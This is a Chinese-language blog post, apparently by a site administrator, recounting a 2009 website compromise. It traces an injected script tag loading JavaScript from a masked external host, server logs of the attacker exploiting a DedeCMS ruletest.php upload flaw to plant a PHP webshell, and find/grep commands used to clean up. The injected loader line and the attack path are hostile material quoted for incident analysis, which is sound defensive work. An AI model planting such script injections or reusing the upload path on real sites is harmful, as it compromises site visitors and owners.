Skip to content

网站被挂马

访问时uchome.c1gstudio.com卡巴斯基报木马,nod32和诺顿无反应。

寻找挂马方式
ie8+开发 和用http_watch发现有挂马请求,ie6,ie7+flidder2,firefox 2和3+firebug无法发现请求.
请求地址为(实际地址已隐去,只作示例)

  1. http://xxx.xxxw3.com/a.js

查看首页原码无此请求,但用dom查看器可以发现。
制作一临时html文件,copy首页源代码放入,通过增删代码找到木马放在/source/script_common.js中
ftp到server查看该文件已被修改并在首行有以下请求代码。

  1. document.writeln("<script src=http:\/\/xxx.xxxw3.com\/%61.js><\/script>");

在uchome.c1gstudio.com/下还有一x.php 十分可疑
下载下来是加密过的,破解后为"黑狼PHP木马".
文件上传日期为2009/04/20.

搜索文件其它域名根目录下也有此文件,立即将其改名禁止攻击者访问。

  1. find /opt/htdocs -name 'x.php' -print

攻击者怎么把木马放上来的呢?
搜索近期的web访问日志,看看攻击者都做了什么操作。

  1. cat /opt/nging/logs/uchome.c1gstudio.com.log |grep /x.php

得到攻击者ip后,再查ip

  1. cat /opt/nging/logs/uchome.c1gstudio.com.log |grep 125.70.209.110
  1. 125.70.209.110 - - [20/Apr/2009:10:12:16 +0800] "GET / HTTP/1.1" 200 5129 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; TencentTraveler ; .NET CLR 2.0.50727)" -
  2. 125.70.209.110 - - [20/Apr/2009:10:12:17 +0800] "GET / HTTP/1.1" 200 5130 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; TencentTraveler ; .NET CLR 2.0.50727)" -
  3. 125.70.209.110 - - [20/Apr/2009:10:12:22 +0800] "-" 400 0 "-" "-" -
  4. 125.70.209.110 - - [20/Apr/2009:10:12:35 +0800] "GET //x.php HTTP/1.1" <strong>200</strong> 444 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; TencentTraveler ; .NET CLR 2.0.50727)" -
  5. 125.70.209.110 - - [20/Apr/2009:10:12:35 +0800] "GET /favicon.ico HTTP/1.1" 200 3638 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; TencentTraveler ; .NET CLR 2.0.50727)" -

木马已上传,再换个日期查

  1. cat /opt/nging/logs/uchome.c1gstudio.com.20090419.log |grep 125.70.209.110
  1. 125.70.209.110 - - [19/Apr/2009:19:25:01 +0800] "GET /../admin/index.asp HTTP/1.1" 400 170 "-" "-" -
  2. 125.70.209.110 - - [19/Apr/2009:19:25:09 +0800] "GET /../admin/default.asp HTTP/1.1" 400 170 "-" "-" -
  3. 125.70.209.110 - - [19/Apr/2009:19:25:12 +0800] "GET /../admin/manage.asp HTTP/1.1" 400 170 "-" "-" -
  4. 125.70.209.110 - - [19/Apr/2009:19:40:01 +0800] "GET / HTTP/1.1" 200 5234 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; TencentTraveler ; .NET CLR 2.0.50727)" -
  5. 125.70.209.110 - - [19/Apr/2009:19:40:48 +0800] "GET /do.php?ac=sendmail&rand=1240141201 HTTP/1.1" 200 35 "http://uchome.c1gstudio.com/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; TencentTraveler ; .NET CLR 2.0.50727)" -
  6. 125.70.209.110 - - [19/Apr/2009:19:40:48 +0800] "GET /favicon.ico HTTP/1.1" 200 3638 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; TencentTraveler ; .NET CLR 2.0.50727)" -
  7. 125.70.209.110 - - [19/Apr/2009:19:42:35 +0800] "GET /includes/class.Member.php HTTP/1.1" 404 526 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; TencentTraveler ; .NET CLR 2.0.50727)" -
  8. 125.70.209.110 - - [19/Apr/2009:19:42:36 +0800] "GET /favicon.ico HTTP/1.1" 304 0 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; TencentTraveler ; .NET CLR 2.0.50727)" -
  9. 125.70.209.110 - - [19/Apr/2009:19:42:45 +0800] "GET /includes/ HTTP/1.1" 404 526 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; TencentTraveler ; .NET CLR 2.0.50727)" -
  10. 125.70.209.110 - - [19/Apr/2009:19:42:46 +0800] "GET /favicon.ico HTTP/1.1" 304 0 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; TencentTraveler ; .NET CLR 2.0.50727)" -
  11. 125.70.209.110 - - [19/Apr/2009:19:43:19 +0800] "GET / HTTP/1.1" 200 5236 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; TencentTraveler ; .NET CLR 2.0.50727)" -
  12. 125.70.209.110 - - [19/Apr/2009:19:43:27 +0800] "GET /do.php?ac=sendmail&rand=1240141399 HTTP/1.1" 200 35 "http://uchome.c1gstudio.com/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; TencentTraveler ; .NET CLR 2.0.50727)" -
  13. 125.70.209.110 - - [19/Apr/2009:19:43:28 +0800] "GET /favicon.ico HTTP/1.1" 200 3638 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; TencentTraveler ; .NET CLR 2.0.50727)" -
  14. 125.70.209.110 - - [19/Apr/2009:19:44:17 +0800] "GET /x.php HTTP/1.1"<strong> 404 </strong>526 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; TencentTraveler ; .NET CLR 2.0.50727)" -
  15. 125.70.209.110 - - [19/Apr/2009:19:44:17 +0800] "GET /favicon.ico HTTP/1.1" 304 0 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; TencentTraveler ; .NET CLR 2.0.50727)" -

攻击者在扫描网站,但还未上传x.php,应该不是在这个域名下上传的。
换个域名

  1. 125.70.209.110 - - [19/Apr/2009:19:25:36 +0800] "GET /DB%23steer/DBBACK/steer@DB.asp HTTP/1.1" 404 3864 "-" "Mozilla/4.0" -
  2. 125.70.209.110 - - [19/Apr/2009:19:25:38 +0800] "GET //guanli/ HTTP/1.1" 302 5 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; TencentTraveler ; .NET CLR 2.0.50727)" -
  3. 125.70.209.110 - - [19/Apr/2009:19:25:38 +0800] "GET //guanli/login.php?gotopage=%2F%2Fguanli%2F HTTP/1.1" 200 984 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; TencentTraveler ; .NET CLR 2.0.50727)" -
  4. 125.70.209.110 - - [19/Apr/2009:19:25:42 +0800] "GET //include/vdimgck.php HTTP/1.1" 200 1304 "http://file.c1gstudio.com//guanli/login.php?gotopage=%2F%2Fguanli%2F" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; TencentTraveler ; .NET CLR 2.0.50727)" -
  5. 125.70.209.110 - - [19/Apr/2009:19:25:44 +0800] "GET /favicon.ico HTTP/1.1" 404 1803 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; TencentTraveler ; .NET CLR 2.0.50727)" -
  6. 125.70.209.110 - - [19/Apr/2009:19:25:51 +0800] "GET //guanli/ruletest.php HTTP/1.1" 200 1152 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; TencentTraveler ; .NET CLR 2.0.50727)" -
  7. 125.70.209.110 - - [19/Apr/2009:19:25:52 +0800] "GET /favicon.ico HTTP/1.1" 404 1803 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; TencentTraveler ; .NET CLR 2.0.50727)" -
  8. 125.70.209.110 - - [19/Apr/2009:19:25:59 +0800] "POST //guanli/ruletest.php HTTP/1.1" 200 48 "http://file.c1gstudio.com//guanli/ruletest.php" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; TencentTraveler ; .NET CLR 2.0.50727)" -
  9. 125.70.209.110 - - [19/Apr/2009:19:26:02 +0800] "GET //guanli/yhs.php HTTP/1.1" 200 35 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; TencentTraveler ; .NET CLR 2.0.50727)" -
  10. 125.70.209.110 - - [19/Apr/2009:19:26:03 +0800] "GET /favicon.ico HTTP/1.1" 404 1803 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; TencentTraveler ; .NET CLR 2.0.50727)" -
  11. 125.70.209.110 - - [19/Apr/2009:19:26:11 +0800] "GET /guanli/yhs.php?=PHPE9568F34-D428-11d2-A769-00AA001ACF42 HTTP/1.1" 200 2536 "http://file.c1gstudio.com//guanli/yhs.php" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; TencentTraveler ; .NET CLR 2.0.50727)" -
  12. 125.70.209.110 - - [19/Apr/2009:19:26:11 +0800] "GET /guanli/yhs.php?=PHPE9568F35-D428-11d2-A769-00AA001ACF42 HTTP/1.1" 200 2158 "http://file.c1gstudio.com//guanli/yhs.php" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; TencentTraveler ; .NET CLR 2.0.50727)" -
  13. 125.70.209.110 - - [19/Apr/2009:19:26:11 +0800] "POST //guanli/yhs.php HTTP/1.1" 200 8617 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; TencentTraveler ; .NET CLR 2.0.50727)" -
  14. 125.70.209.110 - - [19/Apr/2009:19:26:13 +0800] "POST //guanli/yhs.php HTTP/1.1" 200 77 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; TencentTraveler ; .NET CLR 2.0.50727)" -
  15. 125.70.209.110 - - [19/Apr/2009:19:26:40 +0800] "POST //guanli/yhs.php HTTP/1.1" 200 53 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; TencentTraveler ; .NET CLR 2.0.50727)" -
  16. 125.70.209.110 - - [19/Apr/2009:19:26:47 +0800] "GET //guanli/x.php HTTP/1.1" 200 444 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; TencentTraveler ; .NET CLR 2.0.50727)" -
  17. 125.70.209.110 - - [19/Apr/2009:19:26:48 +0800] "GET /favicon.ico HTTP/1.1" 404 1803 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; TencentTraveler ; .NET CLR 2.0.50727)" -
  18. 125.70.209.110 - - [19/Apr/2009:19:26:51 +0800] "POST //guanli/x.php HTTP/1.1" 200 159 "http://file.c1gstudio.com//guanli/x.php" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; TencentTraveler ; .NET CLR 2.0.50727)" -
  19. 125.70.209.110 - - [19/Apr/2009:19:26:54 +0800] "GET /guanli/x.php HTTP/1.1" 200 444 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; TencentTraveler ; .NET CLR 2.0.50727)" -

攻击方法
攻击者通过//guanli/ruletest.php
上传yhs.php 并上传x.php木马
通过x.php对文件植入代码

系统漏洞
ruletest.php 为dede cms的安全漏洞

查找感杂文件
查找web文件夹中是否有挂马
find /opt/htdocs -name "*.js" -exec grep -I -l "w3.com" {} \;
find /opt/htdocs -name "*.htm" -exec grep -I -l "w3.com" {} \;
find /opt/htdocs -name "*.html" -exec grep -I -l "w3.com" {} \;
find /opt/htdocs -name "*.php" -exec grep -I -l "w3.com" {} \;

查找web文件夹中是否还有后门
find /opt/htdocs -name "x.php" -print;

最近修改过的文件(后门可以自定文件修改时间,所以这个不可靠)
find /opt/htdocs -mtime -1 -type f -exec ls -l {} \;

攻击者将多个挂马插入大部分html,js,php,404.htm等也有
改名上传了多个木马在不同目录,并在原有程序上按插上传代码。

修复方法
由于感染太多就将原有web目录移除,并重新上传文件。
删除dede的后台
修改mysql,主机,web等管理密码。

收藏与分享

Posted in 安全.

Tagged with , .

By C1G 四月 23, 2009

0 Responses

Stay in touch with the conversation, subscribe to the RSS feed for comments on this post.



Some HTML is OK

or, reply to this post via trackback.

« mysql sql语句点滴 如何使用shell命令统计某个目录下的文件数(目录中有下级目录) »